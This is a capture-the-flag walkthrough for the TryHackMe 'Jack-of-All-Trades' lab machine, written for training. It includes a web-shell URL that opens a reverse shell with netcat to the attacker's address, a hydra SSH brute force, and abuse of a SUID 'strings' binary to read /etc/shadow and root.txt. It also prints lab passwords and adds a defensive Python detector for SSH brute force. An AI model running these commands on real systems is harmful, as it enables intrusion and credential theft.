Jack-of-All-Trades
Room Link: https://tryhackme.com/room/jackofalltrades
Initial Scan
For some reason the services are swapped: the HTTP site is on port 22 and SSH is on port 80.
Kali
nmap -A $VICTIM
Scan all ports
No other ports found
Kali
nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/22 - HTTP
gobuster dir -u http://$VICTIM:22 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

I had to add the port override in Firefox to view the site on port 22.

There is a stegosaurus picture on the home page, hinting that something is hidden in one of the pictures; eventually we find the jackinthebox username and password in one of them.
Kali
steghide extract -sf stego.jpg
Password: u?WtKSraq
steghide extract -sf header.jpg
Password: u?WtKSraq

When you run a command this way its output is not visible on the rendered page; you have to view the page source to see it.
Browser
view-source:http://$VICTIM:22/nnxhweOV/index.php?cmd=whoami
Kali
nc -lvnp 1337
Browser
view-source:http://$VICTIM:22/nnxhweOV/index.php?cmd=nc%20-c%20sh%2010.10.154.80%201337
Upgrade the shell to a proper TTY (gives autocomplete)
python -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo; fg

In the home directory there is a password list; it is small enough that I copied and pasted it into a file on Kali.

Kali
hydra -s 80 -l jack -P passwords.txt $VICTIM -t4 ssh
Kali
ssh jack@$VICTIM -p 80
Password: ITMJpGGIqg1jn?>@
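A defender-side note added here, not part of the original write-up: because the hydra run above hits sshd on port 80, alerting keyed on destination port 22 misses it, but sshd's own auth.log lines look the same whatever port it listens on (the "port N" in each line is the client's source port). The script below, using constructed log lines and an assumed hostname of "jack", flags a source address that accumulates repeated failures inside a short window and records any login it then gets accepted.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed OpenSSH auth.log sample (hostname "jack" is assumed). Moving sshd
# to port 80 does not change these lines; "port N" is the client source port.
SAMPLE_LOG = """\
Jan 10 12:00:01 jack sshd[2101]: Failed password for jack from 10.10.154.80 port 40102 ssh2
Jan 10 12:00:01 jack sshd[2102]: Failed password for jack from 10.10.154.80 port 40103 ssh2
Jan 10 12:00:02 jack sshd[2103]: Failed password for jack from 10.10.154.80 port 40104 ssh2
Jan 10 12:00:02 jack sshd[2104]: Failed password for invalid user admin from 10.10.154.80 port 40105 ssh2
Jan 10 12:00:03 jack sshd[2105]: Failed password for jack from 10.10.154.80 port 40106 ssh2
Jan 10 12:00:03 jack sshd[2106]: Accepted password for jack from 10.10.154.80 port 40107 ssh2
Jan 10 12:30:00 jack sshd[2200]: Failed password for jack from 192.168.1.5 port 50000 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+ ssh2$"
)


def parse_time(ts: str) -> datetime:
    # syslog timestamps carry no year; the default 1900 is fine for deltas
    return datetime.strptime(ts, "%b %d %H:%M:%S")


def detect_bruteforce(log_text: str, threshold: int = 4, window_s: int = 60) -> dict:
    """Return {ip: {"failures", "users", "compromised"}} for each source IP with
    at least `threshold` failed logins inside a `window_s`-second sliding window.
    An Accepted login from an already-flagged IP is recorded as compromised."""
    recent = defaultdict(list)   # ip -> failure timestamps still inside the window
    targeted = defaultdict(set)  # ip -> usernames it has tried
    alerts = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, ip, user = parse_time(m["ts"]), m["ip"], m["user"]
        if m["result"] == "Failed":
            targeted[ip].add(user)
            recent[ip] = [t for t in recent[ip] if (ts - t).total_seconds() <= window_s]
            recent[ip].append(ts)
            if len(recent[ip]) >= threshold:
                a = alerts.setdefault(ip, {"failures": 0, "compromised": set()})
                a["failures"] = max(a["failures"], len(recent[ip]))
                a["users"] = set(targeted[ip])
        elif ip in alerts:  # success right after a burst of failures: guessed password
            alerts[ip]["compromised"].add(user)
    return alerts
```

With the sample above, 10.10.154.80 is flagged with five failures against jack and admin and a compromised jack account, while the single failure from 192.168.1.5 stays below the threshold.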

PSPY
Kali
wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy32
python2 -m SimpleHTTPServer 81
Victim
cd /tmp
wget http://$KALI:81/pspy32
chmod +x pspy32
./pspy32

strings has the SUID bit set, which means we can run it against files we normally would not be able to read. I tried cracking root's password but it was taking too long.
Victim
find / -perm -u=s -type f 2> /dev/null
/usr/bin/strings /etc/shadow
/usr/bin/strings /etc/passwd
Kali
unshadow passwd shadow > passwords.txt
john --wordlist=/usr/share/wordlists/rockyou.txt passwords.txt

I just ended up using strings to read root.txt.
Kali
/usr/bin/strings /root/root.txt